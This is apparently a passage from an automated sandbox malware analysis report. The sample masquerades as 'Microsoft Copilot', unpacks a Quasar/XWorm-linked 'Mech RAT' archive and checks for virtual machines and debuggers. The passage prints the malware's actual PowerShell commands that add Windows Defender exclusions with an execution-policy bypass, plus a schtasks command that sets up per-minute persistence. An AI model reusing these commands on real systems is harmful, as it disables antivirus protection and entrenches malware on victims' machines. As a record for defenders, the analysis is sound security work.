                    Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.MSTest.TestAdapter.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\protobuf-net.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.Interface.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Gma.System.MouseKeyHook.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.TestFramework.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Guna.UI2.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Rocks.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.binJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Vestris.ResourceLib.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\aa-DJ\Quasar.resources.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe TID: 576Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6012Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860Thread sleep count: 7699 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856Thread sleep count: 1891 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3452Thread sleep count: 2598 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3284Thread sleep count: 6951 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5256Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe TID: 6836Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe TID: 2168Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe TID: 4260Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe TID: 6120Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 3_2_00CFB286 GetSystemInfo,3_2_00CFB286
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeThread delayed: delay time: 922337203685477
                    Source: Microsoft Copilot.exe.1.drBinary or memory string: vmware
                    Source: PixpFUv4G7.exe, 00000000.00000002.1257409990.0000000000CE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                    Source: PixpFUv4G7.exe, 00000000.00000002.1257409990.0000000000CE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                    Source: Copilot.exe, 00000001.00000002.2513107629.000000001BA78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeCode function: 1_2_00007FFAACB3764A CheckRemoteDebuggerPresent,1_2_00007FFAACB3764A
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeCode function: 0_2_00401475 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,0_2_00401475
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe'
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe'
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe'Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe'Jump to behavior
                    Bypasses PowerShell execution policy
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe'
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeProcess created: C:\Users\user\AppData\Local\Temp\Copilot.exe "C:\Users\user~1\AppData\Local\Temp\Copilot.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeProcess created: C:\Windows\SysWOW64\unarchiver.exe "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user~1\AppData\Local\Temp\Mech RAT.zip"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe'Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Copilot.exe'Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe'Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft Copilot.exe'Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Copilot" /tr "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd" "C:\Users\user~1\AppData\Local\Temp\Mech RAT.zip"Jump to behavior
                    Source: Copilot.exe, 00000001.00000002.2504673520.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, Copilot.exe, 00000001.00000002.2504673520.0000000002C4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                    Source: Copilot.exe, 00000001.00000002.2504673520.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, Copilot.exe, 00000001.00000002.2504673520.0000000002C4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: Copilot.exe, 00000001.00000002.2504673520.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, Copilot.exe, 00000001.00000002.2504673520.0000000002C4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                    Source: Copilot.exe, 00000001.00000002.2504673520.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, Copilot.exe, 00000001.00000002.2504673520.0000000002C4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
                    Source: Copilot.exe, 00000001.00000002.2504673520.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, Copilot.exe, 00000001.00000002.2504673520.0000000002C4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager2
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Copilot.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
